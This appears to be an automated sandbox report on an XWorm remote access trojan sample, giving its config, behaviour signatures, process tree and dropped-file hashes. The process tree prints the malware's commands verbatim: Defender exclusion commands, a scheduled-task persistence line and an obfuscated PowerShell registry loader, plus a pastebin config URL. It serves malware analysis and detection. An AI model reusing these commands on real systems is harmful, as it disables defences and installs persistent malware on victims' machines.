Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    11/11/2023, 15:27

General

  • Target

    Xpub updated.exe

  • Size

    1.0MB

  • MD5

    25c2bf24f3b8f423a4181c7f67ae50b5

  • SHA1

    2190d3faa60c34fc4b9a237bba9abac14fc28021

  • SHA256

    713970f3fdf9d2d5a7819c8a84731f331277c7c75f1b88b60c22fabc9f2e2159

  • SHA512

    2f5d0e84db21fe25d3c3e5c647f12b8b292411682514d19d55ccfa0491b8d279872a1866e2af685b870a752be84cf2f1b56f40c37afb3e2cf1135fbbc4fe9cf7

  • SSDEEP

    24576:nyhVzcJg9bxWnM8/uGu7Gzw/Fe552DydluAqYOn+YRD331:yHxl8/q7JFxglVqLnBD331

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

6dscd9NcNiKn8WNo

Attributes
  • Install_directory

    %AppData%

  • install_file

    $k.exe

  • pastebin_url

    https://pastebin.com/raw/s2R3Fsug

aes.plain

Signatures

  • Detect Xworm Payload 7 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k NetworkService
        2⤵
          PID:296
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:480
      • C:\Windows\system32\winlogon.exe
        winlogon.exe
        1⤵
          PID:420
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{04ce3458-9007-44b2-8431-59f630966e59}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2464
        • C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe
          "C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe"
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2320
          • C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
            "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Users\Admin\AppData\Local\Temp\$k.exe
              "C:\Users\Admin\AppData\Local\Temp\$k.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Modifies system certificate store
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1724
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$k.exe'
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:472
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1788
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$k.exe'
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2992
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:288
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$k" /tr "C:\Users\Admin\AppData\Roaming\$k.exe"
                4⤵
                • Creates scheduled task(s)
                PID:1680
              • C:\Users\Admin\AppData\Local\Temp\knwdex.exe
                "C:\Users\Admin\AppData\Local\Temp\knwdex.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2648
                • C:\Users\Admin\AppData\Local\Apps\Installer.exe
                  C:\Users\Admin\AppData\Local\Apps\Installer.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1944
            • C:\Users\Admin\AppData\Local\Temp\$k install.exe
              "C:\Users\Admin\AppData\Local\Temp\$k install.exe"
              3⤵
              • Executes dropped EXE
              PID:2528
          • C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe
            "C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1892
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              3⤵
                PID:2752
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c color 0a
            1⤵
              PID:2100
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {20FCB303-117C-42AC-BAE6-87CCC3A931CB} S-1-5-18:NT AUTHORITY\System:Service:
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:2708
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+''+'E'+'').GetValue(''+'$'+''+[Char](107)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                2⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2564
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              1⤵
                PID:2176
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {A18725B3-5F52-4446-861F-A82D39279CC3} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
                1⤵
                  PID:2952
                  • C:\Users\Admin\AppData\Roaming\$k.exe
                    C:\Users\Admin\AppData\Roaming\$k.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2976

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Apps\Installer.exe

                  Filesize

                  91KB

                  MD5

                  9b778cfe0e786463a843f7d98e38dc41

                  SHA1

                  1bc4def9348a341d9cc3e75fd28df09d1ba53f38

                  SHA256

                  8483f2e72d60c031df90acb798d909d567f07315367961a992daca6fd41b4876

                  SHA512

                  a8373d6073b490d40264015068f5379e1d2f4e778e21dfcd51fea835695fc3b9bd8e077de1b98da5232cb54fe9585828fa54963fa469b459c1296cded9274111

                • C:\Users\Admin\AppData\Local\Apps\python310.dll

                  Filesize

                  4.2MB

                  MD5

                  384349987b60775d6fc3a6d202c3e1bd

                  SHA1

                  701cb80c55f859ad4a31c53aa744a00d61e467e5

                  SHA256

                  f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

                  SHA512

                  6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

                • C:\Users\Admin\AppData\Local\Temp\$k install.exe

                  Filesize

                  161KB

                  MD5

                  5e1781e69a041fc989cbb7abe704363b

                  SHA1

                  2ca02551ed6fefddd421f1303e81c4b8f0814130

                  SHA256

                  9e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d

                  SHA512

                  aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22

                • C:\Users\Admin\AppData\Local\Temp\$k.exe

                  Filesize

                  48KB

                  MD5

                  1e8a020876016dfb400e1f94db3dd866

                  SHA1

                  fbeb8ac7335c139b5d08f929e979d0aa317981e2

                  SHA256

                  463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

                  SHA512

                  298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

                • C:\Users\Admin\AppData\Local\Temp\$k.exe

                  Filesize

                  48KB

                  MD5

                  1e8a020876016dfb400e1f94db3dd866

                  SHA1

                  fbeb8ac7335c139b5d08f929e979d0aa317981e2

                  SHA256

                  463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

                  SHA512

                  298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

                • C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe

                  Filesize

                  1.1MB

                  MD5

                  17daa2459db2c35a6bce85f9c50ce6e1

                  SHA1

                  73812f97c50d8ec2540274b8524d0a1406937c04

                  SHA256

                  7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

                  SHA512

                  cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

                • C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe

                  Filesize

                  1.1MB

                  MD5

                  17daa2459db2c35a6bce85f9c50ce6e1

                  SHA1

                  73812f97c50d8ec2540274b8524d0a1406937c04

                  SHA256

                  7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

                  SHA512

                  cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

                • C:\Users\Admin\AppData\Local\Temp\Cab320A.tmp

                  Filesize

                  61KB

                  MD5

                  f3441b8572aae8801c04f3060b550443

                  SHA1

                  4ef0a35436125d6821831ef36c28ffaf196cda15

                  SHA256

                  6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

                  SHA512

                  5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

                • C:\Users\Admin\AppData\Local\Temp\Tar325B.tmp

                  Filesize

                  163KB

                  MD5

                  9441737383d21192400eca82fda910ec

                  SHA1

                  725e0d606a4fc9ba44aa8ffde65bed15e65367e4

                  SHA256

                  bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

                  SHA512

                  7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

                • C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

                  Filesize

                  181KB

                  MD5

                  fe6bd020ec20bb2df56a84d14805627e

                  SHA1

                  9e091bc5b6e93c63a99329e4a1295a397f647abc

                  SHA256

                  e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3

                  SHA512

                  60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

                • C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

                  Filesize

                  181KB

                  MD5

                  fe6bd020ec20bb2df56a84d14805627e

                  SHA1

                  9e091bc5b6e93c63a99329e4a1295a397f647abc

                  SHA256

                  e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3

                  SHA512

                  60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

                • C:\Users\Admin\AppData\Local\Temp\knwdex.exe

                  Filesize

                  17.8MB

                  MD5

                  adc21ba585ed59f51a2f04b51cf20727

                  SHA1

                  a0b10b8c8d7816045e5c193019a8303531d1197f

                  SHA256

                  f19529eb433f85dd5e733bd500f17a9bfdaa3df7f6ce6aa0c51be0c3f892465f

                  SHA512

                  5b1f39ec9ee37c72832b5cbc7820e8b123053715fb5628db208e1389107786f8e71747aa4c3b7203fb9c0fa601e20e53ae5329d3c1c66dbced033815ac1a1151

                • C:\Users\Admin\AppData\Local\Temp\knwdex.exe

                  Filesize

                  17.8MB

                  MD5

                  adc21ba585ed59f51a2f04b51cf20727

                  SHA1

                  a0b10b8c8d7816045e5c193019a8303531d1197f

                  SHA256

                  f19529eb433f85dd5e733bd500f17a9bfdaa3df7f6ce6aa0c51be0c3f892465f

                  SHA512

                  5b1f39ec9ee37c72832b5cbc7820e8b123053715fb5628db208e1389107786f8e71747aa4c3b7203fb9c0fa601e20e53ae5329d3c1c66dbced033815ac1a1151

                • C:\Users\Admin\AppData\Roaming\$k.exe

                  Filesize

                  48KB

                  MD5

                  1e8a020876016dfb400e1f94db3dd866

                  SHA1

                  fbeb8ac7335c139b5d08f929e979d0aa317981e2

                  SHA256

                  463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

                  SHA512

                  298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

                • C:\Users\Admin\AppData\Roaming\$k.exe

                  Filesize

                  48KB

                  MD5

                  1e8a020876016dfb400e1f94db3dd866

                  SHA1

                  fbeb8ac7335c139b5d08f929e979d0aa317981e2

                  SHA256

                  463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

                  SHA512

                  298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

                • C:\Users\Admin\AppData\Roaming\$k.exe

                  Filesize

                  48KB

                  MD5

                  1e8a020876016dfb400e1f94db3dd866

                  SHA1

                  fbeb8ac7335c139b5d08f929e979d0aa317981e2

                  SHA256

                  463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

                  SHA512

                  298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  ba53ffdfea9e4cd4b490673f540c62d4

                  SHA1

                  5e53d5fdf60069af43c8b17ba4329a61884f9cbb

                  SHA256

                  19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

                  SHA512

                  59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  ba53ffdfea9e4cd4b490673f540c62d4

                  SHA1

                  5e53d5fdf60069af43c8b17ba4329a61884f9cbb

                  SHA256

                  19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

                  SHA512

                  59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  ba53ffdfea9e4cd4b490673f540c62d4

                  SHA1

                  5e53d5fdf60069af43c8b17ba4329a61884f9cbb

                  SHA256

                  19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

                  SHA512

                  59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YIU154EP64R693Z5XZFV.temp

                  Filesize

                  7KB

                  MD5

                  ba53ffdfea9e4cd4b490673f540c62d4

                  SHA1

                  5e53d5fdf60069af43c8b17ba4329a61884f9cbb

                  SHA256

                  19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

                  SHA512

                  59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

                • \Users\Admin\AppData\Local\Apps\Installer.exe

                  Filesize

                  91KB

                  MD5

                  9b778cfe0e786463a843f7d98e38dc41

                  SHA1

                  1bc4def9348a341d9cc3e75fd28df09d1ba53f38

                  SHA256

                  8483f2e72d60c031df90acb798d909d567f07315367961a992daca6fd41b4876

                  SHA512

                  a8373d6073b490d40264015068f5379e1d2f4e778e21dfcd51fea835695fc3b9bd8e077de1b98da5232cb54fe9585828fa54963fa469b459c1296cded9274111

                • \Users\Admin\AppData\Local\Apps\python310.dll

                  Filesize

                  4.2MB

                  MD5

                  384349987b60775d6fc3a6d202c3e1bd

                  SHA1

                  701cb80c55f859ad4a31c53aa744a00d61e467e5

                  SHA256

                  f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

                  SHA512

                  6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

                • \Users\Admin\AppData\Local\Temp\AE-FREE.exe

                  Filesize

                  1.1MB

                  MD5

                  17daa2459db2c35a6bce85f9c50ce6e1

                  SHA1

                  73812f97c50d8ec2540274b8524d0a1406937c04

                  SHA256

                  7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

                  SHA512

                  cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

                • \Users\Admin\AppData\Local\Temp\AE-FREE.exe

                  Filesize

                  1.1MB

                  MD5

                  17daa2459db2c35a6bce85f9c50ce6e1

                  SHA1

                  73812f97c50d8ec2540274b8524d0a1406937c04

                  SHA256

                  7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

                  SHA512

                  cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

                • memory/288-161-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/288-155-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/288-156-0x0000000002700000-0x0000000002780000-memory.dmp

                  Filesize

                  512KB

                • memory/288-157-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/288-160-0x000000000270B000-0x0000000002772000-memory.dmp

                  Filesize

                  412KB

                • memory/288-159-0x0000000002700000-0x0000000002780000-memory.dmp

                  Filesize

                  512KB

                • memory/288-158-0x0000000002700000-0x0000000002780000-memory.dmp

                  Filesize

                  512KB

                • memory/420-71-0x0000000000870000-0x000000000089B000-memory.dmp

                  Filesize

                  172KB

                • memory/420-72-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

                  Filesize

                  64KB

                • memory/420-60-0x0000000000840000-0x0000000000864000-memory.dmp

                  Filesize

                  144KB

                • memory/420-58-0x0000000000840000-0x0000000000864000-memory.dmp

                  Filesize

                  144KB

                • memory/420-61-0x0000000000870000-0x000000000089B000-memory.dmp

                  Filesize

                  172KB

                • memory/420-75-0x0000000037830000-0x0000000037840000-memory.dmp

                  Filesize

                  64KB

                • memory/420-92-0x0000000077841000-0x0000000077842000-memory.dmp

                  Filesize

                  4KB

                • memory/420-63-0x0000000000870000-0x000000000089B000-memory.dmp

                  Filesize

                  172KB

                • memory/464-100-0x00000000009C0000-0x00000000009EB000-memory.dmp

                  Filesize

                  172KB

                • memory/464-103-0x0000000037830000-0x0000000037840000-memory.dmp

                  Filesize

                  64KB

                • memory/464-80-0x00000000009C0000-0x00000000009EB000-memory.dmp

                  Filesize

                  172KB

                • memory/464-102-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

                  Filesize

                  64KB

                • memory/472-124-0x00000000029D0000-0x0000000002A50000-memory.dmp

                  Filesize

                  512KB

                • memory/472-123-0x00000000029D0000-0x0000000002A50000-memory.dmp

                  Filesize

                  512KB

                • memory/472-125-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/472-121-0x00000000029D0000-0x0000000002A50000-memory.dmp

                  Filesize

                  512KB

                • memory/472-120-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/472-119-0x00000000025F0000-0x00000000025F8000-memory.dmp

                  Filesize

                  32KB

                • memory/472-122-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/472-118-0x000000001B1B0000-0x000000001B492000-memory.dmp

                  Filesize

                  2.9MB

                • memory/480-109-0x0000000000060000-0x000000000008B000-memory.dmp

                  Filesize

                  172KB

                • memory/480-112-0x0000000037830000-0x0000000037840000-memory.dmp

                  Filesize

                  64KB

                • memory/480-110-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

                  Filesize

                  64KB

                • memory/480-90-0x0000000000060000-0x000000000008B000-memory.dmp

                  Filesize

                  172KB

                • memory/1724-97-0x000000001B130000-0x000000001B1B0000-memory.dmp

                  Filesize

                  512KB

                • memory/1724-30-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

                  Filesize

                  72KB

                • memory/1724-131-0x000000001B130000-0x000000001B1B0000-memory.dmp

                  Filesize

                  512KB

                • memory/1724-31-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1724-81-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1728-20-0x000000001B290000-0x000000001B310000-memory.dmp

                  Filesize

                  512KB

                • memory/1728-17-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1728-15-0x0000000000EA0000-0x0000000000ED4000-memory.dmp

                  Filesize

                  208KB

                • memory/1728-32-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1788-138-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/1788-136-0x0000000002890000-0x0000000002910000-memory.dmp

                  Filesize

                  512KB

                • memory/1788-137-0x0000000002890000-0x0000000002910000-memory.dmp

                  Filesize

                  512KB

                • memory/1788-132-0x0000000002320000-0x0000000002328000-memory.dmp

                  Filesize

                  32KB

                • memory/1788-133-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/1788-134-0x0000000002890000-0x0000000002910000-memory.dmp

                  Filesize

                  512KB

                • memory/1788-135-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2320-1-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2320-2-0x000000001B290000-0x000000001B310000-memory.dmp

                  Filesize

                  512KB

                • memory/2320-18-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2320-0-0x0000000000260000-0x0000000000370000-memory.dmp

                  Filesize

                  1.1MB

                • memory/2464-46-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-52-0x00000000777F0000-0x0000000077999000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2464-45-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-55-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-50-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-48-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-44-0x0000000140000000-0x0000000140008000-memory.dmp

                  Filesize

                  32KB

                • memory/2464-53-0x00000000776D0000-0x00000000777EF000-memory.dmp

                  Filesize

                  1.1MB

                • memory/2464-111-0x00000000777F0000-0x0000000077999000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2564-43-0x00000000776D0000-0x00000000777EF000-memory.dmp

                  Filesize

                  1.1MB

                • memory/2564-38-0x0000000001230000-0x00000000012B0000-memory.dmp

                  Filesize

                  512KB

                • memory/2564-36-0x0000000001230000-0x00000000012B0000-memory.dmp

                  Filesize

                  512KB

                • memory/2564-33-0x0000000019D00000-0x0000000019FE2000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2564-76-0x00000000777F0000-0x0000000077999000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2564-79-0x00000000776D0000-0x00000000777EF000-memory.dmp

                  Filesize

                  1.1MB

                • memory/2564-41-0x0000000000F90000-0x0000000000FBA000-memory.dmp

                  Filesize

                  168KB

                • memory/2564-35-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2564-34-0x0000000000D90000-0x0000000000D98000-memory.dmp

                  Filesize

                  32KB

                • memory/2564-37-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2564-40-0x0000000001230000-0x00000000012B0000-memory.dmp

                  Filesize

                  512KB

                • memory/2564-39-0x0000000001230000-0x00000000012B0000-memory.dmp

                  Filesize

                  512KB

                • memory/2564-42-0x00000000777F0000-0x0000000077999000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2564-54-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2976-202-0x00000000009F0000-0x0000000000A02000-memory.dmp

                  Filesize

                  72KB

                • memory/2976-203-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2976-278-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2992-149-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2992-148-0x00000000029E0000-0x0000000002A60000-memory.dmp

                  Filesize

                  512KB

                • memory/2992-147-0x00000000029E0000-0x0000000002A60000-memory.dmp

                  Filesize

                  512KB

                • memory/2992-146-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2992-145-0x00000000029E0000-0x0000000002A60000-memory.dmp

                  Filesize

                  512KB

                • memory/2992-144-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

                  Filesize

                  9.6MB